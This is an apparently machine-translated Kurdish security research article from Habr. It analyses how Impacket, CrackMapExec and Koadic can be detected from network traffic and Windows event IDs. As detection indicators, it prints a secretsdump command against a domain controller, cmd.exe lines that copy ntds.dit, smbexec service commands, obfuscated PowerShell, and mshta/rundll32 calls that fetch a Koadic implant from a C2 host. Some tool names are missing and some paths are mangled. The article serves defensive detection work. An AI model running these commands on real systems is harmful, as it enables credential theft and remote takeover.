Hejmara êrîşan di sektora pargîdanî de her sal zêde dibe: mînak ji sala 2016, û di dawiya 2018 de - ji serdema berê. Di nav wan de yên ku amûra xebatê ya sereke pergala xebitandina Windows-ê ye. Di 2017-2018 de, APT Dragonfly, APT28, li Ewropa, Amerîkaya Bakur û Erebîstana Siûdî li dijî rêxistinên hikûmetê û leşkerî êrîş pêk anîn. Û me ji bo vê yekê sê amûr bikar anîn - , и . Koda çavkaniya wan vekirî ye û li ser GitHub heye.
Hêjayî gotinê ye ku ev amûr ne ji bo ketina destpêkê, lê ji bo pêşxistina êrîşek di nav binesaziyê de têne bikar anîn. Êrîşkar wan di qonaxên cûda yên êrîşê de li dû ketina perîmê bikar tînin. Ev, bi awayê, dijwar e ku were tesbît kirin û pir caran tenê bi alîkariya teknolojiyê an amûrên ku destûrê didin . Amûr fonksiyonên cihêreng peyda dikin, ji veguheztina pelan bigire heya danûstendina bi qeydê re û pêkanîna fermanan li ser makîneyek dûr. Me lêkolînek li ser van amûran kir da ku çalakiya torê ya wan diyar bike.
Tiştê ku me hewce kir ku em bikin:
- Fêm bikin ka amûrên hacking çawa dixebitin. Fêr bibin ka êrîşkar çi hewce dike ku îstismar bikin û çi teknolojiyên ew dikarin bikar bînin.
- Tiştê ku di qonaxên yekem ên êrîşê de ji hêla amûrên ewlehiya agahdariyê ve nayê dîtin bibînin. Qonaxa keşfê dibe ku were derbas kirin, ji ber ku êrîşkar êrîşkarek hundurîn e, an jî ji ber ku êrîşkar qulikek di binesaziyê de ku berê nedihat zanîn bi kar tîne. Ew gengaz dibe ku meriv tevahiya zincîra kiryarên wî vegerîne, ji ber vê yekê jî xwestek ji bo tespîtkirina tevgera din.
- Pozîtîvên derewîn ji amûrên tespîtkirina destwerdanê derxînin. Divê em ji bîr nekin ku gava ku hin kiryar li ser bingeha keşfê tenê têne kifş kirin, xeletiyên pir caran gengaz in. Bi gelemperî di binesaziyê de hejmarek têr rê hene, ku di nihêrîna pêşîn de ji yên rewa nayên cûda kirin, ji bo bidestxistina her agahdarî.
Ev amûr çi didin êrîşkaran? Ger ev Impacket be, wê hingê êrîşkar pirtûkxaneyek mezin a modulan werdigirin ku dikarin di qonaxên cûda yên êrîşê de yên ku piştî şikandina dorpêçê li pey têne bikar bînin. Gelek amûr modulên Impacket di hundurê de bikar tînin - mînakî Metasploit. Ji bo pêkanîna fermana ji dûr ve dcomexec û wmiexec heye, ji bo wergirtina hesabên ji bîra ku ji Impacket hatine zêdekirin Secretsdump heye. Wekî encamek, tesbîtkirina rast a çalakiya pirtûkxaneyek wusa dê tespîtkirina deran misoger bike.
Ne tesaduf e ku afirîneran li ser CrackMapExec (an bi tenê CME) "Powered by Impacket" nivîsand. Wekî din, CME ji bo senaryoyên populer xwedan fonksiyonek amade ye: Mimikatz ji bo bidestxistina şîfreyan an haşeyên wan, pêkanîna Meterpreter an nûnerê Empire ji bo darvekirina ji dûr ve, û Bloodhound li ser gemiyê.
Amûra sêyemîn a ku me hilbijart Koadic bû. Ew pir nû ye, ew di sala 25-an de di konferansa hacker a navneteweyî DEFCON 2017 de hate pêşkêş kirin û ji hêla nêzîkatiyek ne-standard ve tê veqetandin: ew bi HTTP, Java Script û Microsoft Visual Basic Script (VBS) dixebite. Ji vê nêzîkatiyê re tê gotin ku ji axê dijîn: amûr komek girêdayî û pirtûkxaneyên ku di Windows-ê de hatine çêkirin bikar tîne. Afirîner jê re dibêjin COM Command & Control, an C3.
IMPACKET
Karbidestiya Impacket pir berfireh e, ji vedîtina li hundurê AD û berhevkirina daneyan ji pêşkêşkerên hundurîn MS SQL, heya teknîkên ji bo bidestxistina pêbaweriyan: ev êrîşek relayek SMB ye, û wergirtina pelê ntds.dit ku tê de haş şîfreyên bikarhêner ji kontrolkerek domainê vedihewîne. Impacket di heman demê de fermanan ji dûr ve bi karanîna çar awayên cûda pêk tîne: WMI, Xizmeta Rêvebiriya Bernameya Windows, DCOM, û SMB, û ji bo vê yekê pêbaweriyan hewce dike.
Secretsdump
Ka em li Secretsdump mêze bikin. Ev modulek e ku dikare hem makîneyên bikarhêner û hem jî kontrolkerên domainê bike hedef. Ew dikare ji bo bidestxistina kopiyên deverên bîranînê LSA, SAM, SECURITY, NTDS.dit were bikar anîn, ji ber vê yekê ew dikare di qonaxên cûda yên êrîşê de were dîtin. Di xebata modulê de gava yekem pejirandina bi riya SMB-ê ye, ku ji şîfreya bikarhêner an jî hashê wê hewce dike ku bixweber êrîşa Pass the Hash pêk bîne. Dûv re daxwazek tê ku meriv bigihîje Gerînendeyê Kontrola Karûbarê (SCM) û bi protokola winreg ve bigihîje qeydê, ku bi karanîna wê êrîşkar dikare daneyên şaxên berjewendiyê bibîne û bi riya SMB-ê encam bigire.
Di Fig. 1 em dibînin ka bi rastî dema ku protokola winreg bikar tîne, gihîştina bi karanîna mifteya qeydê ya bi LSA re tête peyda kirin. Ji bo vê yekê, emrê DCERPC bi opcode 15 - OpenKey bikar bînin.
Birinc. 1. Vekirina mifteya qeydê bi karanîna protokola winreg
Dûv re, gava ku gihîştina mifteyê tê bidestxistin, nirx bi fermana SaveKey bi opcode 20 têne tomar kirin. Impacket vê yekê bi rengek pir taybetî dike. Ew nirxan li pelek ku navê wê rêzek ji 8 tîpên rasthatî ye ku bi .tmp ve hatî pêvekirin hilîne. Wekî din, barkirina vê pelê bi SMB-ê ji pelrêça System32 (Hêjî. 2) pêk tê.
Birinc. 2. Plana bidestxistina mifteya qeydê ji makîneyek dûr
Derket holê ku çalakiya wusa li ser torê dikare ji hêla pirsnameyên hin şaxên qeydkirinê ve bi karanîna protokola winreg, navên taybetî, ferman û rêza wan ve were tesbît kirin.
Ev modul di têketina bûyera Windows-ê de jî şopan dihêle, ku tespîtkirina wê hêsan dike. Mînakî, di encama pêkanîna fermanê de
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCDi têketina Windows Server 2016 de em ê rêzika sereke ya bûyeran bibînin:
1. 4624 - Têketinê dûr.
2. 5145 - kontrolkirina mafên gihîştina karûbarê dûr a winreg.
3. 5145 - kontrolkirina mafên gihîştina pelê di pelrêça System32 de. Navê pelê ku li jor hatî behs kirin heye.
4. 4688 - afirandina pêvajoyek cmd.exe ku vssadmin dest pê dike:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - çêkirina pêvajoyek bi fermanê:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - çêkirina pêvajoyek bi fermanê:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - çêkirina pêvajoyek bi fermanê:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Mîna gelek amûrên piştî îstismarkirinê, Impacket xwedan modulên ji bo pêkanîna fermanan ji dûr ve ye. Em ê bala xwe bidin ser smbexec, ku li ser makîneyek dûr şêlek fermanek înteraktîf peyda dike. Di heman demê de ev modul bi riya SMB-ê, an bi şîfreyek an jî şîfreyek haş, verastkirinê hewce dike. Di Fig. Di jimar 3 de em mînakek dibînin ka amûrek wusa çawa dixebite, di vê rewşê de ew konsolê rêveberê herêmî ye.
Birinc. 3. Konsolê smbexec înteraktîf
Pêngava yekem a smbexec piştî pejirandinê vekirina SCM-ê bi fermana OpenSCManagerW (15) ye. Pirs balkêş e: qada MachineName DUMMY ye.
Birinc. 4. Daxwaza vekirina Gerînendeyê Kontrola Karûbarê
Piştre, karûbar bi karanîna fermana CreateServiceW (12) tê afirandin. Di doza smbexec de, em dikarin her car heman mantiqa avakirina fermanê bibînin. Di Fig. 5 kesk pîvanên fermanê yên neguhêrbar destnîşan dike, zer destnîşan dike ka êrîşkar çi dikare biguhezîne. Meriv hêsan e ku meriv bibîne ku navê pelê darvekirî, pelrêça wê û pelê derketinê dikare were guheztin, lê ya mayî guheztina bêyî ku mentiqê modula Impacket têk bibe pir dijwartir e.
Birinc. 5. Daxwaza afirandina karûbarek bi karanîna Gerînendeyê Kontrola Karûbarê
Smbexec di têketina bûyera Windows-ê de jî şopên eşkere dihêle. Di têketina Windows Server 2016-ê de ji bo şêlê fermana înteraktîf bi fermana ipconfig, em ê rêzika sereke ya bûyeran bibînin:
1. 4697 - sazkirina karûbarê li ser makîneya mexdûr:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - afirandina pêvajoya cmd.exe bi argumanên ji xala 1.
3. 5145 - kontrolkirina mafên gihîştina pelê __output di pelrêça C$ de.
4. 4697 - sazkirina karûbarê li ser makîneya mexdûr.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - afirandina pêvajoya cmd.exe bi argumanên ji xala 4.
6. 5145 - kontrolkirina mafên gihîştina pelê __output di pelrêça C$ de.
Impacket bingeha pêşxistina amûrên êrîşê ye. Ew hema hema hemî protokolan di binesaziya Windows-ê de piştgirî dike û di heman demê de taybetmendiyên xwe yên taybetmendiyê heye. Li vir daxwazên winreg-ê yên taybetî hene, û karanîna SCM API-ya bi avakirina fermana taybetmendî, û forma navê pelê, û SMB SYSTEM32 parve dikin.
CRACKMAPEXEC
Amûra CME di serî de ji bo otomatîkkirina wan kiryarên rûtîn ên ku êrîşkarek neçar e ku bike da ku di nav torê de pêşde bibe hatî çêkirin. Ew dihêle hûn bi kargêrê navdar Empire û Meterpreter re bi hev re bixebitin. Ji bo pêkanîna fermanan bi veşartî, CME dikare wan bişewitîne. Bi karanîna Bloodhound (alavek vedîtinê ya cihêreng), êrîşkar dikare lêgerîna danişîna rêveberê domainek çalak otomatîk bike.
Bloodhound
Bloodhound, wekî amûrek serbixwe, rê dide vedîtina pêşkeftî di nav torê de. Ew daneyên li ser bikarhêneran, makîneyan, koman, danişînan berhev dike û wekî skrîptek PowerShell an pelek binary tê peyda kirin. Protokolên LDAP an SMB-based ji bo berhevkirina agahdariyê têne bikar anîn. Modula entegrasyona CME dihêle ku Bloodhound li makîneya mexdûr were dakêşandin, daneyên berhevkirî piştî darvekirinê bimeşîne û bistîne, bi vî rengî çalakiyên di pergalê de otomatîk bike û wan kêm xuya bike. Şela grafîkî ya Bloodhound daneyên berhevkirî di forma grafîkan de pêşkêş dike, ku dihêle hûn ji makîneya êrîşkar heya rêveberê domainê riya herî kurt bibînin.
Birinc. 6. Navbera Bloodhound
Ji bo ku li ser makîneya qurbanê bixebite, modul bi karanîna ATSVC û SMB karek diafirîne. ATSVC navberek e ku bi Bernameya Peywira Windows-ê re dixebite. CME fonksiyona xwe ya NetrJobAdd (1) bikar tîne da ku peywiran li ser torê biafirîne. Mînaka tiştê ku modula CME dişîne di Fig. 7: Ev bangek fermana cmd.exe ye û kodek veşarî ye ku di forma argumanan de di forma XML de ye.
Fig.7. Afirandina peywirek bi CME
Piştî ku peywir ji bo darvekirinê hate şandin, makîneya mexdûr bixwe Bloodhound dest pê dike, û ev dikare di trafîkê de were dîtin. Module ji hêla pirsên LDAP ve tête diyar kirin ku komên standard, navnîşek hemî makîne û bikarhênerên di domê de bistînin, û agahdariya li ser danişînên bikarhênerê çalak bi riya daxwaza SRVSVC NetSessEnum bistînin.
Birinc. 8. Bi rêya SMB-ê navnîşek danişînên çalak bistînin
Wekî din, destpêkirina Bloodhound li ser makîneya mexdûrek ku lênêrînê çalak e bi bûyerek bi ID 4688 (afirandina pêvajoyê) û navê pêvajoyê re tê. «C:WindowsSystem32cmd.exe». Tiştê ku di derbarê wê de balkêş e argumanên rêza fermanê ne:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Modula enum_avproducts ji hêla fonksiyon û pêkanînê ve pir balkêş e. WMI dihêle hûn zimanê pirsê WQL bikar bînin da ku daneyan ji tiştên cihêreng ên Windows-ê bistînin, ku bi rastî ev modula CME bikar tîne. Ew ji dersên AntiSpywareProduct û AntiМirusProduct di derbarê amûrên parastinê yên ku li ser makîneya qurbanê hatine saz kirin de pirsan çêdike. Ji bo bidestxistina daneyên pêwîst, modul bi cîhê navê rootSecurityCenter2 ve girêdide, dûv re pirsek WQL çêdike û bersivek distîne. Di Fig. Xiflteya 9 naveroka daxwaz û bersivên weha nîşan dide. Di mînaka me de, Windows Defender hate dîtin.
Birinc. 9. Çalakiya torê ya modula enum_avproducts
Bi gelemperî, lênihêrîna WMI (Trace WMI-Activity), ku di bûyerên ku hûn dikarin di derheqê pirsên WQL de agahdariya kêrhatî bibînin, dibe ku neçalak be. Lê heke çalak be, wê demê heke skrîpta enum_avproducts were xebitandin, dê bûyerek bi ID 11 were hilanîn. Ew ê navê bikarhênerê ku daxwaz şandiye û navek di cîhê navan de rootSecurityCenter2 hebe.
Her yek ji modulên CME hunerên xwe hebûn, çi pirsên WQL-ya taybetî be an jî çêkirina celebek peywirek di nexşerêyek peywirê de bi tevlihevî û çalakiya taybetî ya Bloodhound-ê di LDAP û SMB de be.
KOADIC
Taybetmendiyek cihêreng a Koadic karanîna wergêrên JavaScript û VBScript ên ku di Windows-ê de hatine çêkirin e. Di vê wateyê de, ew li dû meyla jiyîna axê dişopîne - ango, pêwendiya wê ya derveyî tune û amûrên standard ên Windows-ê bikar tîne. Ev amûrek ji bo Ferman û Kontrola tevahî (CnC) ye, ji ber ku piştî enfeksiyonê "implant" li ser makîneyê tê saz kirin, ku dihêle ku ew were kontrol kirin. Di termînolojiya Koadî de ji makîneyeke weha re "zombî" tê gotin. Ger îmtiyazên ji bo xebata tam li ser milê mexdûran ne bes bin, Koadic xwedan şiyana wan e ku wan bi karanîna teknolojiyên Kontrolkirina Hesabê Bikarhêner (UAC bypass) bilind bike.
Birinc. 10. Koadic Shell
Divê mexdûr bi servera Ferman & Kontrolê re têkilî bide destpêkirin. Ji bo vê yekê, ew hewce ye ku bi URI-ya ku berê hatî amade kirin re têkilî daynin û laşê sereke yê Koadic bi karanîna yek ji qonaxan werbigirin. Di Fig. Xiflteya 11 mînakek ji bo qonaxa mshta nîşan dide.
Birinc. 11. Destpêkirina danişîna bi servera CnC
Li ser bingeha guhêrbara bersivê WS, eşkere dibe ku darvekirin bi navgîniya WScript.Shell pêk tê, û guhêrbarên STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE di derheqê pîvanên rûniştina heyî de agahdariya sereke dihewîne. Ev yekem cotê daxwaz-bersiv e di pêwendiyek HTTP de bi serverek CnC re. Daxwazên paşîn rasterast bi fonksiyona modulên binavkirî (implant) ve girêdayî ne. Hemî modulên Koadic tenê bi danişînek çalak a bi CnC re dixebitin.
Mimikatz
Mîna ku CME bi Bloodhound re dixebite, Koadic bi Mimikatz re wekî bernameyek cihêreng dixebite û gelek awayên destpêkirina wê hene. Li jêr cotek daxwaz-bersiv ji bo dakêşana implanta Mimikatz heye.
Birinc. 12. Veguheztina Mimikatz bo Koadic
Hûn dikarin bibînin ka forma URI ya di daxwaznameyê de çawa guherî. Naha ew nirxek ji bo guherbara csrf, ku ji modula hilbijartî berpirsiyar e, vedihewîne. guh nedin navê wê; Em hemî dizanin ku CSRF bi gelemperî cûda tê fêm kirin. Bersiv heman laşê sereke yê Koadic bû, ku koda girêdayî Mimikatz lê zêde bû. Ew pir mezin e, ji ber vê yekê em li xalên sereke binêrin. Li vir pirtûkxaneya Mimikatz-ê ya ku di base64-ê de hatî kod kirin, çînek .NET-ya serialkirî ya ku wê derzî bike, û argumanên destpêkirina Mimikatz-ê heye. Encama darvekirinê li ser torê di nivîsek zelal de tê şandin.
Birinc. 13. Encama xebitandina Mimikatz li ser makîneyek dûr
Exec_cmd
Koadic di heman demê de modul hene ku dikarin fermanan ji dûr ve bicîh bikin. Li vir em ê heman rêbaza hilberîna URI û guhêrbarên naskirî yên sid û csrf bibînin. Di mijara modulê exec_cmd de, kod li laşê ku karibe fermanên şêlê bicîh bîne tê zêde kirin. Li jêr kodek wusa ya ku di bersiva HTTP ya servera CnC de heye tê destnîşan kirin.
Birinc. 14. Koda Implant exec_cmd
Guherbara GAWTUUGCFI bi taybetmendiya WS ya naskirî ji bo darvekirina kodê hewce ye. Bi alîkariya wê, implant gazî şêlê dike, du şaxên kodê hildiweşîne - shell.exec bi vegerandina herika daneya derketinê û shell.run bêyî vegerê.
Koadic ne amûrek tîpîk e, lê ew hunerên xwe hene ku bi wan re di seyrûsefera rewa de tê dîtin:
- avakirina taybetî ya daxwazên HTTP,
- bikaranîna winHttpRequests API,
- bi ActiveXObject ve hêmanek WScript.Shell çêbikin,
- bedena îcrakar mezin.
Têkiliya destpêkê ji hêla qonax ve tê destpêkirin, ji ber vê yekê gengaz e ku çalakiya wê bi navgîniya bûyerên Windows-ê vedîtin. Ji bo mshta, ev bûyer 4688 e, ku çêkirina pêvajoyek bi taybetmendiya destpêkê destnîşan dike:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Dema ku Koadic dimeşîne, hûn dikarin 4688 bûyerên din ên bi taybetmendiyên ku bi tevahî wê diyar dikin bibînin:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1vebiguherin
Jiyana ji axê di nav sûcdaran de populerbûna xwe bi dest dixe. Ew ji bo hewcedariyên xwe amûr û mekanîzmayên ku di Windows-ê de hatine çêkirin bikar tînin. Em dibînin ku amûrên populer Koadic, CrackMapExec û Impacket li gorî vê prensîbê her ku diçe di raporên APT de xuya dibin. Hejmara forkeyên li ser GitHub ji bo van amûran jî zêde dibe, û yên nû xuya dibin (jixwe nêzî hezar ji wan hene). Meyl ji ber sadebûna xwe populerbûna xwe bi dest dixe: êrîşker ne hewceyî amûrên sêyemîn in; ew berê li ser makîneyên mexdûran in û ji wan re dibin alîkar ku tedbîrên ewlehiyê derbas bikin. Em bala xwe didin lêkolîna pêwendiya torê: her amûrek ku li jor hatî destnîşan kirin şopên xwe di seyrûsefera torê de dihêle; lêkolîna berfireh a wan hişt ku em hilberê xwe hîn bikin wan tespît bikin, ku di dawiyê de ji bo vekolîna tevahiya zincîra bûyerên sîber ên ku bi wan re têkildar in dibe alîkar.
Nivîskar:
- Anton Tyurin, Serokê Daîreya Karûbarên Pispor, Navenda Ewlekariya Pisporê PT, Teknolojiyên Positive
- Egor Podmokov, pispor, Navenda Ewlekariya Pisporê PT, Teknolojiyên Positive
Source: www.habr.com